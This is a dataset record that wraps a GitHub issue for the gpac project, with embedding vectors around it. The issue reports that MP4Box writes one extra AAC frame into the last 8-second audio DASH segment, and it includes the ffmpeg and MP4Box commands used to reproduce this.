0.013444310054183006, 0.013928532600402832, -0.016719935461878777, 0.0007494775345548987, -0.012853273190557957, -0.009086302481591702, -0.00019971975416410714, -0.019810419529676437, -0.009285688400268555, 0.01301705464720726, -0.00012995691213291138, -0.009335535578429699, 0.01646358333528042, -0.0007904228987172246, -0.01239753421396017, -0.014683350920677185, 0.01308114267885685, -0.038766324520111084, 0.010197167284786701, 0.007740447763353586, 0.004635723307728767, -0.014612141996622086, 0.02049402706325054, -0.007434247527271509, -0.0009453030652366579, 0.0058640833012759686, 0.007220619823783636, 0.004418535158038139, -0.007174334023147821, -0.020209191367030144, 0.0136009706184268, -0.01751748099923134, 0.02496596984565258, 0.021248845383524895, -0.015623313374817371, 0.002171882661059499, -0.0066260225139558315, 0.00001924875505210366, 0.011621352285146713, -0.007754689548164606, 0.0016476045129820704, -0.00708532240241766, 0.01472607720643282, 0.010738357901573181, 0.009926572442054749, -0.008865553885698318, -0.005045176949352026, 0.013957017101347446, -0.007939833216369152, 0.01736081950366497, 0.024182667955756187, 0.01363657508045435, -0.0033860006369650364, 0.009876725263893604, -0.0016538352938368917, -0.011671199463307858, -0.0017241544555872679, 0.01083805039525032, 0.004016202874481678, 0.0036530354991555214, 0.010482004843652248, -0.005173353478312492, 0.0013013493735343218, -0.0053300135768949986, -0.010175804607570171, 0.015950875356793404, -0.0037954540457576513, -0.0032809670083224773, -0.00875874049961567, 0.013430068269371986, 0.006910859607160091, -0.003373539075255394, 0.0073416754603385925, -0.04708356782793999, 0.015167574398219585, 0.009955056011676788, -0.013843081891536713, -0.0006466691847890615, -0.014455481432378292, -0.001574615016579628, 0.005536520853638649, 0.0009844681480899453, -0.015224541537463665, -0.010446399450302124, -0.012091333977878094, 0.006330504082143307, -0.021035218611359596, 0.02925276756286621, 0.004963286221027374, -0.00737015949562192, -0.006661626975983381, -0.021063702180981636, -0.001517647528089583, -0.021377023309469223, 0.0033343739341944456, -0.006796924863010645, 0.015950875356793404, 0.014697592705488205, -0.007804535795003176, -0.015765732154250145, 0.012931603007018566, -0.0015194277511909604, 0.012789185158908367, 0.018699554726481438, -0.004447018727660179, -0.03896571323275566, 0.006373229436576366, -0.005230320617556572, 0.008808586746454239, 0.019397404044866562, -0.0017793416045606136, 0.020437059924006462, -0.02818462811410427, 0.009905209764838219, 0.015067880973219872, -0.02060796320438385, -0.009178875014185905, -0.01633540540933609, 0.01187058538198471, -0.01140060368925333, -0.004696251358836889, -0.02492324449121952, -0.006184524856507778, -0.004261874593794346, -0.009185995906591415, -0.007961195893585682, 0.013408705592155457, 0.03044908307492733, -0.017047498375177383, -0.015765732154250145, -0.01416352391242981, 0.02294362708926201, -0.011792254634201527, 0.014327305369079113, -0.011186975985765457, 0.023356640711426735, 0.010125958360731602, -0.010880776681005955, -0.029964860528707504, 0.0024406977463513613, -0.01612177863717079, 0.005016692914068699, 0.004763900302350521, -0.00821042899042368, -0.006917980499565601, 0.01299569196999073, 0.0017125828890129924, 0.004803065210580826, -0.004244072362780571, 0.0018585618818178773, 0.016762662678956985, 0.0025190277956426144, 0.01945437304675579, 0.00299434969201684, -0.011585747823119164, -0.02049402706325054, 0.01847168430685997, 0.03147449716925621, -0.0006871694349683821, -0.010453520342707634, 0.010154441930353642, 0.007245542947202921, -0.0033379343803972006, -0.016748420894145966, 0.001036094850860536, -0.0026062591932713985, -0.05090038478374481, 0.010980469174683094, 0.001992079196497798, -0.00149005395360291, 0.009022214449942112, 0.01190618984401226, 0.025336258113384247, 0.021419748663902283, 0.02828432247042656, -0.0048493510112166405, -0.004023323766887188, 0.009798395447432995, 0.01962527446448803, -0.008559354580938816, -0.007448489777743816, -0.042811013758182526, 0.013180836103856564, 0.01753172278404236, -0.0060919527895748615, -0.015637556090950966, 0.007840140722692013, 0.013928532600402832, 0.005219639278948307, -0.007590908091515303, -0.00737728038802743, -0.02614804357290268, -0.0034856938291341066, 0.01837199181318283, 0.008972368203103542, 0.016563275828957558, 0.007925591431558132, 0.011806496419012547, 0.009777032770216465, -0.01362233329564333, -0.03457922115921974, 0.018058670684695244, -0.004970407113432884, 0.008153460919857025, 0.0022430920507758856, -0.010012023150920868, 0.021277328953146935, -0.01633540540933609, -0.0037028819788247347, 0.010439278557896614, 0.015979360789060593, -0.015480895526707172, 0.016905080527067184, -0.002161201322451234, -0.005853401962667704, -0.03802574798464775, -0.018799247220158577, 0.016677210107445717, -0.017104465514421463, -0.022416677325963974, -0.005671818275004625, 0.023356640711426735, 0.027657680213451385, 0.0017366160172969103, 0.005212518386542797, -0.009791274555027485, 0.0009435228421352804, 0.019938595592975616, 0.011671199463307858, -0.009385381825268269, -0.009969297796487808, -0.02177579514682293, -0.00023988622706383467, -0.005970897153019905, -0.020024046301841736, 0.022331226617097855, 0.000150318315718323, 0.015025155618786812, -0.03503496199846268, -0.019198019057512283, 0.013707784004509449, 0.01731809414923191, 0.03606037423014641, -0.012198147363960743, 0.015893908217549324, -0.021020976826548576, 0.006319822743535042, -0.015153332613408566, 0.00035159577964805067, -0.009542042389512062, -0.008787224069237709, -0.004379370249807835, 0.008317242376506329, -0.025763513520359993, 0.0028768545016646385, -0.005928171798586845, -0.003617430804297328, -0.018129879608750343, -0.0136721795424819, -0.004172862973064184, -0.005180474370718002, 0.02284393273293972, -0.006159601733088493, 0.020194949582219124, -0.02062220498919487, 0.002008101437240839, 0.011742408387362957, 0.01636389084160328, -0.019867386668920517, 0.017090223729610443, -0.026489848271012306, -0.008708893321454525, 0.013223561458289623, 0.016093295067548752, -0.006109755486249924, -0.011778012849390507, -0.01310962624847889, -0.0007552633178420365, 0.00037585143581964076, -0.00033357093343511224, 0.002770040649920702, 0.001598648144863546, -0.01315235160291195, -0.005725225433707237, 0.025179598480463028, -0.02295786887407303, -0.000648449407890439, 0.009499316103756428, -0.002191465348005295, -0.010645785368978977, 0.00650852732360363, -0.004870714154094458, 5.84138547310431e-7, -0.0021416188683360815, 0.01736081950366497, -0.010076111182570457, 0.012055729515850544, 0.02930973470211029, 0.00628065736964345, 0.012297840788960457, 0.0164493415504694, -0.012013004161417484, 0.0019262107089161873, 0.0024478186387568712, -0.003681519301608205, -0.0005816906923428178, 0.026803169399499893, -0.010567455552518368, -0.00001613335007277783, -0.0060883923433721066, -0.0046179210767149925, 0.009093423373997211, 0.025877447798848152, -0.006512087769806385, 0.010111716575920582, -0.017845042049884796, -0.0064017134718596935, 0.008438298478722572, 0.007768931332975626, -0.018713796511292458, -0.024239635095000267, -0.001611999818123877, 0.011685441248118877, -0.0025421709287911654, -0.017688382416963577, 0.0068467711098492146, 0.0025742151774466038, 0.020109497010707855, -0.002526148920878768, -0.00677912263199687, -0.0036993215326219797, -0.0027682604268193245, 0.005187595263123512, 0.0005732346326112747, -0.025421708822250366, 0.0014891638420522213, 0.004471942316740751, 0.0348355732858181, -0.0026863696984946728, -0.012041487731039524, 0.026974070817232132, -0.003054877743124962, 0.017788074910640717, -0.013957017101347446, -0.008466782048344612, -0.000060917303926544264, 0.003003251040354371, -0.010353827849030495, 0.007181454915553331, -0.009442348964512348, 0.010446399450302124, 0.03435135260224342, -0.007505456916987896, -0.01528150960803032, 0.006643824744969606, 0.009072060696780682, 0.0129743292927742, 0.007711963728070259, 0.003731365781277418, -0.014548053964972496, -0.01848592609167099, -0.007925591431558132, -0.0003912059182766825, 0.005241002421826124, -0.002462060423567891, -0.023043319582939148, -0.0043473257683217525, 0.008253154344856739, 0.03227204084396362, 0.0030762404203414917, -0.008367089554667473, 0.0051591116935014725, 0.0043900515884160995, -0.0026881499215960503, -0.0015692742308601737, 0.023684203624725342, 0.0033860006369650364, -0.008623442612588406, 0.01840047538280487, 0.008288758806884289, 0.005568564869463444, 0.0283840149641037, 0.01474031899124384, 0.005169793032109737, -0.016705693677067757, 0.0030459763947874308, 0.011827860027551651, 0.0038239378482103348, 0.015537862665951252, 0.009364019148051739, 0.008865553885698318, -0.0033610775135457516, -0.0124188968911767, 0.00032400217605754733, -0.006391032133251429, -0.013957017101347446, 0.007060398813337088, -0.01850016787648201, 0.003766970243304968, -0.0018371990881860256, 0.012774942442774773, 0.005621972028166056, -0.05127067491412163, -0.0014749219408258796, -0.0073559177108109, -0.01733233593404293, -0.007633633445948362, -0.0025759954005479813, -0.0163781326264143, 0.007854382507503033, 0.01636389084160328, 0.01971072517335415, -0.008018163964152336, 0.013344616629183292, 0.010973348282277584, 0.02166185900568962, 0.0038453005254268646, -0.014426997862756252, -0.02264454774558544, 0.007704842835664749, 0.005294409114867449, -0.009342656470835209, -0.018656829372048378, 0.0038453005254268646, -0.025322016328573227, 0.004272555932402611, -0.017902011051774025, 0.006974948104470968, 0.005333574488759041, -0.010660027153789997, 0.0261622853577137, 0.002296498976647854, -0.0051555512472987175, -0.010716995224356651, 0.0018745840061455965, -0.002056167693808675, -0.012760700657963753, -0.010140200145542622, 0.0031136253383010626, -0.021989421918988228, -0.00820330809801817, -0.024467505514621735, -0.005657576490193605, 0.019198019057512283, 0.011122887954115868, 0.013202198781073093, 0.009292809292674065, -0.018671071156859398, 0.004222709685564041, 0.006433757487684488, 0.02607683464884758, -0.02614804357290268, -0.006198767106980085, -0.011058799922466278, 0.0015728346770629287, 0.0021932455711066723, 0.015965119004249573, -0.015666039660573006, -0.022544855251908302, 0.006447999272495508, 0.0026774685829877853, 0.019967079162597656, -0.022616064175963402, 0.009364019148051739, -0.00048244278877973557, -0.005073660518974066, -0.011194096878170967, -0.011656957678496838, 0.012604041025042534, 0.01315235160291195, -0.0007757359999231994, 0.022217292338609695, -0.003035295056179166, 0.016606001183390617, 0.021932454779744148, 0.025236565619707108, -0.02181852050125599, 0.01136499922722578, 0.002244872273877263, -0.008495265617966652, -0.024253876879811287, -0.014925463125109673, -0.01142196636646986, 0.008694651536643505, -0.007017673458904028, -0.002203926909714937, -0.008153460919857025, 0.020978251472115517, 0.022060630843043327, -0.023342398926615715, 0.008559354580938816, 0.010902139358222485, -0.0016369230579584837, 0.001077040215022862, 0.013771872967481613, 0.006942903622984886, 0.005084341857582331, -0.019169535487890244, -0.010553213767707348, -0.0013876906596124172, 0.012732217088341713, -0.01825805753469467, -0.018998632207512856, 0.04377945885062218, -0.008986609987914562, 0.021063702180981636, -0.005828478839248419, 0.01417776569724083, 0.005009572021663189, 0.019397404044866562, -0.022445160895586014, 0.004963286221027374, -0.018072912469506264, 0.0033468357287347317, 0.012240873649716377, 0.008573596365749836, -0.014896979555487633, -0.015808457508683205, -0.020892798900604248, 0.0038061353843659163, -0.01941164769232273, -0.015651797875761986, -0.01253995206207037, -0.018713796511292458, -0.009940814226865768, -0.012347687035799026, 0.02604835107922554, 0.008317242376506329, 0.014455481432378292, 0.03398106247186661, -0.030164245516061783, 0.007882866077125072, -0.004030444659292698, 0.015537862665951252, 0.007989680394530296, 0.010531851090490818, 0.00029952399199828506, -0.012839031405746937, 0.019169535487890244, 0.0250514205545187, -0.005486674141138792, 0.008737376891076565, 0.003898707451298833, 0.017830800265073776, -0.005201837047934532, 0.0007641644915565848, 0.011543022468686104, -0.0007165432907640934, 0.013358859345316887, 0.0065797362476587296, 0.00628777826204896, 0.009826879017055035, -0.016606001183390617, -0.011101525276899338, -0.004293919075280428, 0.025863206014037132, 0.010859414003789425, -0.010161562822759151, -0.036345209926366806, -0.0025314895901829004, 0.010866534896194935, 0.004934802185744047, 0.015096365474164486, 0.015879666432738304, -0.015466652810573578, -0.02495172806084156, -0.006597538944333792, -0.010880776681005955, -0.0037812122609466314, -0.00018514410476200283, 0.004486184101551771, -0.0005398552748374641, 0.015537862665951252, 0.0008393792668357491, 0.010325344279408455, -0.0063554272055625916, -0.0022466524969786406, 0.02173306979238987, 0.031189659610390663, -0.02916731685400009, -0.006269976031035185, 0.016662968322634697, 0.021505199372768402, -0.0033788797445595264, -0.03557614982128143, 0.0367724671959877, 0.006309141404926777, -0.008894037455320358, 0.030847854912281036, -0.018172604963183403, 0.0003636123437900096, -0.000016063810107880272, 0.01962527446448803, 0.010766841471195221, -0.004429216496646404, 0.00176777015440166, -0.0020668490324169397, -0.004788823425769806, 0.002211047802120447, 0.008915400132536888, 0.0012879977002739906, 0.005782192572951317, 0.02728739194571972, -0.004738976713269949, 0.02077886462211609, 0.0053834207355976105, 0.002113135065883398, 0.0073416754603385925, 0.008416935801506042, 0.0037206842098385096, 0.01620722934603691, -0.008317242376506329, 0.008716014213860035, 0.003766970243304968, -0.005789313465356827, -0.008780103176832199, 0.006569054909050465, 0.01643509976565838, 0.02385510504245758, 0.007982559502124786, 0.015438169240951538, 0.016022086143493652, -0.02264454774558544, -0.012041487731039524, -0.011664078570902348, -0.02188972942531109, -0.00819618720561266, -0.018201088532805443, -0.0018371990881860256, 0.013878686353564262, -0.01314523071050644, -0.0024976651184260845, 0.01253995206207037, 0.003731365781277418, -0.02159065008163452, -0.009556284174323082, 0.007711963728070259, -0.01298145018517971, 0.015580588020384312, 0.0028537113685160875, 0.024168426170945168, 0.01639237441122532, 0.0016013184795156121, -0.007306070998311043, -0.005657576490193605, -0.0038524214178323746, -0.0009862483711913228, 0.012176784686744213, -0.03925054892897606, 0.0065797362476587296, 0.00299434969201684, 0.009285688400268555, 0.013287649489939213, 0.02290090173482895, -0.01743202842772007, -0.0020686292555183172, 0.0062450529076159, -0.0017775613814592361, -0.007274026982486248, -0.011763771064579487, 0.004607239738106728, -0.013729146681725979, -0.022017905488610268, 0.01973920874297619, 0.03281323239207268, -0.009962176904082298, 0.011685441248118877, 0.023470574989914894, 0.004771021194756031, -0.0046642073430120945, -0.023684203624725342, 0.0036281123757362366, -0.00078597228275612, -0.0024139941670000553, 0.02082158997654915, 0.00011705023644026369, -0.008815707638859749, -0.022445160895586014, 0.010154441930353642, 0.009520679712295532, -0.004592997953295708, -0.0023089605383574963, -0.03056301921606064, 0.01298145018517971, 0.002547511598095298, 0.03175933286547661, -0.0015167574165388942, 0.006654506083577871, -0.020422818139195442, -0.007590908091515303, 0.01841471716761589, 0.004767460748553276, 0.008388452231884003, 0.00046063496847637, 0.016990531235933304, -0.01198451966047287, -0.022174566984176636, 0.005493795033544302, -0.0010948425624519587, 0.017930494621396065, 0.014241853728890419, -0.013280528597533703, -0.007747568655759096, 0.000028734053557855077, 0.0011945355217903852, 0.02818462811410427, -0.013999742455780506, -0.015765732154250145, 0.008345725946128368, -0.007060398813337088, 0.006597538944333792, -0.0037954540457576513, 0.0007810766692273319, -0.016905080527067184, 0.007676359266042709, 0.011308032087981701, 0.012952965684235096, 0.008979489095509052, -0.017759591341018677, -0.006423076149076223, 0.019881628453731537, 0.02509414590895176, 0.016933564096689224, -0.022473644465208054, 0.00512706721201539, 0.0023961919359862804, -0.012874635867774487, -0.01850016787648201, 0.0060955132357776165, -0.002878634724766016, 0.019027117639780045, -0.014548053964972496, -0.0023303234484046698, 0.00598869938403368, -0.006586857605725527, -0.0023961919359862804, 0.03272778168320656, 0.008609200827777386, 0.005935292690992355, 0.014362909831106663, 0.009043577127158642, -0.007021233905106783, -0.009876725263893604, -0.017033256590366364, -0.006650945637375116, 0.009214479476213455, 0.019212260842323303, 0.015025155618786812, 0.002262674504891038, 0.04432065039873123, 0.02624773606657982, -0.005030934698879719, 0.005753709003329277, 0.04531757906079292, 0.023029077798128128, 0.0006515647983178496, 0.009876725263893604, -0.004966846667230129, -0.007412884850054979, 0.01141484547406435, 0.009841120801866055, 0.004532469902187586, 0.006601099390536547, 0.013957017101347446, -0.0018745840061455965, 0.002116695512086153, 0.01959679089486599, -0.010709874331951141, -0.0023694883566349745, -0.002282257191836834, 0.006348306313157082, 0.021263087168335915, -0.00682896887883544, -0.012860394082963467, 0.0013431848492473364, 0.020337367430329323, 0.025393225252628326, -0.01640661619603634, -0.012632524594664574, -0.01189906895160675, 0.024638406932353973, 0.023014836013317108, -0.038566939532756805, 0.011842101812362671, 0.007519698701798916, -0.0013031295966356993, -0.014384272508323193, 0.004094533156603575, -0.0006684770341962576, -0.010168683715164661, -0.02059372141957283, 0.011215459555387497, -0.01734657771885395, 0.022402435541152954, -0.009435228072106838, 0.0017259346786886454, -0.0011010733433067799, -0.00297298701480031, -0.006718594580888748, 0.01730385236442089, -0.002608039416372776, 0.005618411116302013, -0.01629268005490303, -0.004425656050443649, -0.01184922270476818, 0.014640625566244125, -0.007711963728070259, 0.02070765569806099, -0.013280528597533703, 0.006166722625494003, -0.000858516723383218, -0.012646766379475594, -0.02928125113248825, -0.0015888568013906479, -0.003980597946792841, 0.008545111864805222, -0.02945215441286564, 0.022416677325963974, 0.023598751053214073, 0.004311721306294203, 0.012077092193067074, -0.01191331073641777, -0.007719084620475769, -0.010104595683515072, -0.019126810133457184, 0.003816816722974181, 0.007053277920931578, -0.00592461135238409, -0.023114528506994247, 0.002360587241128087, -0.008053768426179886, -0.007469852454960346, -0.003478572703897953, 0.0037918935995548964, 0.012347687035799026, -0.005244562868028879, 0.021419748663902283, 0.009463711641728878, 0.003234680974856019, 0.01721840165555477, 0.03409499675035477, -0.012625403702259064, -0.004824427887797356, 0.004685570020228624, -0.008295879699289799, -0.012084213085472584, -0.02171882800757885, -0.011094404384493828, 0.0016876596491783857, -0.021020976826548576, -0.0071173664182424545, 0.000024060944269876927, -0.0035034960601478815, -0.01973920874297619, 0.02180427871644497, 0.02603410929441452, 0.012297840788960457, -0.009926572442054749, 0.0025688742753118277, -0.008659047074615955, 0.009143270552158356, -0.002942722989246249, 0.0005403003306128085, -0.001743737026117742, -0.02916731685400009, 0.012297840788960457, -0.009890967048704624, 0.011820739135146141, -0.0237269289791584, -0.01364369597285986, 0.015851182863116264, 0.005700301844626665, -0.019254986196756363, 0.013415826484560966, 0.020209191367030144, -0.009648855775594711, 0.0025546324905008078, -0.0037990144919604063, 0.024268118664622307, -0.011108646169304848, 0.002679248806089163, 0.004589437507092953, 0.004856472369283438, 0.009129028767347336, -0.00170724221970886, 0.018898939713835716, -0.015637556090950966, -0.026774685829877853, -0.019853144884109497, -0.0013369540683925152, -0.012126938439905643, -0.02156216651201248, -0.015694523230195045, -0.018699554726481438, -0.0017188137862831354, -0.007420005742460489, -0.022445160895586014, -0.006921540945768356, -0.0014802627265453339, -0.014996672049164772, -0.005636213812977076, -0.00020372527069412172, -0.004333083983510733, 0.004144379403442144, 0.03173084929585457, -0.013800356537103653, -0.010966227389872074, 0.008124977350234985, -0.010702753439545631, -0.008481023833155632, 0.04748234152793884, 0.005561443977057934, 0.014113676734268665, 0.01255419384688139, -0.011834980919957161, 0.009100544266402721, -0.007505456916987896, -0.006675868760794401, -0.002018782775849104, 0.006123997271060944, -0.01612177863717079, 0.013408705592155457, 0.008723135106265545, -0.0016751980874687433, -0.011486055329442024, -0.015765732154250145, -0.009812637232244015, -0.011778012849390507, -0.0021950257942080498, -0.015552104450762272, 0.012119817547500134, 0.008573596365749836, 0.01300993375480175, -0.011108646169304848, -0.003738486673682928, -0.0004637503589037806, 0.010282618924975395, -0.021006735041737556, -0.008110735565423965, 0.008075131103396416, 0.02264454774558544, -0.012625403702259064, -0.006394592579454184, -0.006334064528346062, 0.015751490369439125, 0.0034589902497828007, 0.006433757487684488, 0.01189906895160675, -0.022331226617097855, -0.003888026112690568, -0.019297711551189423, 0.009762790985405445, 0.01315235160291195, -0.00737728038802743, -0.011300911195576191, 0.028711577877402306, -0.02290090173482895, 0.028569158166646957, 0.035319797694683075, 0.015993602573871613, 0.009876725263893604, 0.004244072362780571, -0.0025386104825884104, 0.010959106497466564, 0.0037171237636357546, -0.004774581640958786, 0.01841471716761589, -0.006615341175347567, -0.02925276756286621, -0.021305812522768974, -0.0038346191868185997, -0.01740354485809803, -0.013230682350695133, -0.010296860709786415, -0.015680281445384026, -0.00821754988282919, 0.026375913992524147, 0.01632116362452507, 0.003377099521458149, 0.023143012076616287, -0.007676359266042709, -0.014768802560865879, -0.005572125315666199, -0.009015093557536602, 0.0037812122609466314, -0.03475012257695198, 0.001595087582245469, -0.014968188479542732, 0.008972368203103542, -0.006472922395914793, -0.025393225252628326, -0.019269227981567383, 0.00541190430521965, 0.0006115096039138734, 0.016064811497926712, 0.004155060742050409, -0.005073660518974066, -0.011436209082603455, 0.017659898847341537, -0.012155422009527683, 0.030078794807195663, 0.00006453340029111132, 0.0043615675531327724, -0.016791146248579025, 0.02063644677400589, -0.005767950788140297, 0.015566346235573292, 0.01302417553961277, -0.00017101351113524288, 0.02711649052798748, 0.002705952152609825, 0.000050708789785858244, -0.03178781643509865, -0.014939704909920692, 0.003058438189327717, -0.020907040685415268, 0.007719084620475769, -0.018941665068268776, 0.001293338369578123, -0.006693671457469463, 0.009029335342347622, -0.011272427625954151, -0.016919322311878204, -0.002946283435449004, 0.005027374252676964, -0.003467891365289688, 0.01958254911005497, -0.009378260932862759, 0.007252663839608431, 0.017887769266963005, -0.007209938485175371, 0.00325070321559906, 0.01623571291565895, -0.008167702704668045, -0.0026810290291905403, -0.0011838540667667985, -0.000631537230219692, 0.027971001341938972, 0.0163781326264143, -0.005618411116302013, 0.010225650854408741, 0.0019208700396120548, 0.008381331339478493, 0.01305265910923481, 0.01963951624929905, -0.005458190571516752, -0.017845042049884796, 0.012105575762689114, 0.000005983943083265331, 0.01417064480483532, 0.01362945418804884, 0.04543151333928108, -0.0029356020968407393, -0.013166594319045544, -0.014426997862756252, -0.00026970510953105986, -0.019183777272701263, -0.013964137993752956, 0.004568074829876423, 0.004140818957239389, 0.007932712323963642, 0.014939704909920692, -0.002810986014083028, -0.0061453599482774734, 0.012661008164286613, 0.010553213767707348, 0.03494950756430626, 0.024652648717164993, -0.013757631182670593, 0.01362945418804884, -0.01475456077605486, 0.027657680213451385, 0.01239753421396017, -0.02836977317929268, -0.001690329983830452, -0.01306690089404583, 0.008986609987914562, -0.002371268579736352, 0.027785856276750565, -0.0014802627265453339, -0.029879409819841385, -0.015295751392841339, -0.0005937072564847767, -0.006668747868388891, 0.014996672049164772, 0.0011357878101989627, 0.018129879608750343, 0.003966356161981821, 0.015851182863116264, 0.004503986332565546, 0.007783173117786646, 0.02513687126338482, -0.034180447459220886, 0.0051092649810016155, 0.0068894969299435616, -0.005305090453475714, 0.00002543784285080619, -0.01313098892569542, 0.006519208662211895, 0.003980597946792841, 0.004785262979567051, -0.011685441248118877, 0.007897107861936092, 0.006316262297332287, -0.013209319673478603, 0.025877447798848152, 0.0013200418325141072, -0.0027112928219139576, 0.020251916721463203, -0.010368069633841515, 0.010553213767707348, -0.019981320947408676, -0.0013778993161395192, -0.0008732036803849041 ]
2,319
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I am trying to create 100% even duration of video(h264) and audio(aac) segments. This is a known challenge with AAC codec 1024 sample length. We have this an even magic integer `seconds=8, rate=48000, dashscale=48000, segdur=384000` to be used. Video segment's duration is easy to match an integer duration. **MP4box always writes one extra MDAT.TRAF payload element <ins>to the last audio segment</ins>**, it does not matter how many seconds I encode from the input.mp4 file. A bug in a segment splitter's audio sample loop counter? I am trying to write 100% exact 1..n segments, encoding input timelimit is matched to a multiplier of 8 seconds. Input file: [00_llama_1080p_25fps.mp4](https://m.dtv.fi/dash/00_llama_1080p_25fps.mp4) Statistics of the segments and few arguments, **Please note must use** ` -movflags empty_moov` flag so MP4Box is able to write an even duration of audio segments, removing a flag will make mp4box more easily write uneven audio segments, even the first segment may not match our 8s target. ``` ffmpeg : -t XX encode XX seconds from the input file negative_cts_offsets enable negative MOOF/TRAF/TRUN.cts timestamp empty_moov write initial moov(mp4box writes an even audio durations) +cgop -sc_threshold use closed gop, disable scenecut mp4box : segments 8sec duration (384000/48000) --tfdt64 use tfdt 64bit ver=1 box -subsegs-per-sidx 0 use one SIDX box --noroll=yes disable roll sample grouping video : SIDX.duration=102400, SIDX.scale=12800 -> 8sec mdat.traf=200*512 duration=102400/12800 -> 8sec audio : SIDX.duration=384000, SIDX.scale=48000 -> 8sec mdat.traf=375*1024 duration=384000/48000 -> 8sec - all but last one has 375 samples matching 8s target. audio : SIDX.duration=385024, SIDX.scale=48000 -> 8,0213sec (last) mdat.traf=376*1024 duration=385024/48000 -> 8,0213sec - one extra sample element 385024-1024=384000. ``` Encoding and dash commands: ``` ffmpeg -hide_banner -nostats -i "./00_llama_1080p_25fps.mp4" -threads 4 -preset fast \ -c:v libx264 -profile:v main -level 4.0 -s:v 640x360 -b:v 512k -pix_fmt yuv420p \ -refs 3 -bf 3 -g 50 -keyint_min 25 -b_strategy 1 -flags +cgop -sc_threshold 0 \ -movflags "empty_moov+negative_cts_offsets+faststart" \ -an -t 32 -y "temp-v1.mp4" ffmpeg -hide_banner -nostats -i "./00_llama_1080p_25fps.mp4" -threads 4 \ -c:a aac -strict experimental -b:a 128k \ -af "aresample=48000" -ar 48000 -ac 2 \ -movflags "empty_moov+negative_cts_offsets+faststart" \ -vn -t 32 -y "temp-a1.mp4" MP4Box -dash 384000 -frag 384000 -dash-scale 48000 -closest -mem-frags -rap \ -profile "dashavc264:live" -profile-ext "urn:hbbtv:dash:profile:isoff-live:2012" \ -min-buffer 4000 -bs-switching no \ -sample-groups-traf -single-traf --tfdt64 --tfdt_traf --noroll=yes -subsegs-per-sidx 0 \ -segment-name "$RepresentationID$/$Number$$Init=i$" -out "manifest.mpd" \ "temp-v1.mp4#trackID=1:id=v1:period=p0" \ "temp-a1.mp4#trackID=1:id=a1:period=p0" ``` (mp4box, ffmpeg compiled from the latest git sources)
Write even duration of video and audio(aac), last audio segment always has one extra mdat.traf payload element
https://api.github.com/repos/gpac/gpac/issues/1711/comments
3
2021-03-18T07:33:23
2021-03-23T10:07:43Z
https://github.com/gpac/gpac/issues/1711
834,484,763
1,711
false
This is a GitHub Issue repo:gpac owner:gpac Title : Write even duration of video and audio(aac), last audio segment always has one extra mdat.traf payload element Issue date: --- start body --- I am trying to create 100% even duration of video(h264) and audio(aac) segments. This is a known challenge with AAC codec 1024 sample length. We have this an even magic integer `seconds=8, rate=48000, dashscale=48000, segdur=384000` to be used. Video segment's duration is easy to match an integer duration. **MP4box always writes one extra MDAT.TRAF payload element <ins>to the last audio segment</ins>**, it does not matter how many seconds I encode from the input.mp4 file. A bug in a segment splitter's audio sample loop counter? I am trying to write 100% exact 1..n segments, encoding input timelimit is matched to a multiplier of 8 seconds. Input file: [00_llama_1080p_25fps.mp4](https://m.dtv.fi/dash/00_llama_1080p_25fps.mp4) Statistics of the segments and few arguments, **Please note must use** ` -movflags empty_moov` flag so MP4Box is able to write an even duration of audio segments, removing a flag will make mp4box more easily write uneven audio segments, even the first segment may not match our 8s target. ``` ffmpeg : -t XX encode XX seconds from the input file negative_cts_offsets enable negative MOOF/TRAF/TRUN.cts timestamp empty_moov write initial moov(mp4box writes an even audio durations) +cgop -sc_threshold use closed gop, disable scenecut mp4box : segments 8sec duration (384000/48000) --tfdt64 use tfdt 64bit ver=1 box -subsegs-per-sidx 0 use one SIDX box --noroll=yes disable roll sample grouping video : SIDX.duration=102400, SIDX.scale=12800 -> 8sec mdat.traf=200*512 duration=102400/12800 -> 8sec audio : SIDX.duration=384000, SIDX.scale=48000 -> 8sec mdat.traf=375*1024 duration=384000/48000 -> 8sec - all but last one has 375 samples matching 8s target. audio : SIDX.duration=385024, SIDX.scale=48000 -> 8,0213sec (last) mdat.traf=376*1024 duration=385024/48000 -> 8,0213sec - one extra sample element 385024-1024=384000. ``` Encoding and dash commands: ``` ffmpeg -hide_banner -nostats -i "./00_llama_1080p_25fps.mp4" -threads 4 -preset fast \ -c:v libx264 -profile:v main -level 4.0 -s:v 640x360 -b:v 512k -pix_fmt yuv420p \ -refs 3 -bf 3 -g 50 -keyint_min 25 -b_strategy 1 -flags +cgop -sc_threshold 0 \ -movflags "empty_moov+negative_cts_offsets+faststart" \ -an -t 32 -y "temp-v1.mp4" ffmpeg -hide_banner -nostats -i "./00_llama_1080p_25fps.mp4" -threads 4 \ -c:a aac -strict experimental -b:a 128k \ -af "aresample=48000" -ar 48000 -ac 2 \ -movflags "empty_moov+negative_cts_offsets+faststart" \ -vn -t 32 -y "temp-a1.mp4" MP4Box -dash 384000 -frag 384000 -dash-scale 48000 -closest -mem-frags -rap \ -profile "dashavc264:live" -profile-ext "urn:hbbtv:dash:profile:isoff-live:2012" \ -min-buffer 4000 -bs-switching no \ -sample-groups-traf -single-traf --tfdt64 --tfdt_traf --noroll=yes -subsegs-per-sidx 0 \ -segment-name "$RepresentationID$/$Number$$Init=i$" -out "manifest.mpd" \ "temp-v1.mp4#trackID=1:id=v1:period=p0" \ "temp-a1.mp4#trackID=1:id=a1:period=p0" ``` (mp4box, ffmpeg compiled from the latest git sources) --- end body ---
3,427
[ -0.044515810906887054, 0.008943631313741207, -0.021464714780449867, 0.01522440742701292, 0.0029522075783461332, 0.007434140425175428, -0.02648285962641239, 0.046652570366859436, -0.04105167090892792, 0.00546735106036067, -0.010044385679066181, 0.024038538336753845, 0.009445445612072945, -0.000723887758795172, -0.014180309139192104, -0.00047196875675581396, -0.0016268505714833736, -0.005600898526608944, 0.009736821986734867, 0.01541056390851736, 0.007073966786265373, -0.011541735380887985, -0.01879376545548439, 0.054681602865457535, -0.024232788011431694, 0.02303490787744522, -0.04555181413888931, 0.017919637262821198, -0.022549280896782875, 0.01740163564682007, 0.00787929818034172, 0.039012037217617035, -0.026984674856066704, 0.018032949417829514, 0.03059450164437294, 0.0235529113560915, 0.06818203628063202, 0.04629644379019737, 0.011549829505383968, 0.004605363123118877, -0.01898801699280739, -0.024605102837085724, -0.07064254581928253, 0.01645466312766075, -0.01931176707148552, 0.029558498412370682, -0.00635361997410655, 0.008854599669575691, -0.01478734239935875, -0.0036179213784635067, 0.021416151896119118, -0.02122190035879612, -0.05918174609541893, -0.029542310163378716, -0.004633691161870956, -0.02667711116373539, 0.06876478344202042, 0.003506631823256612, 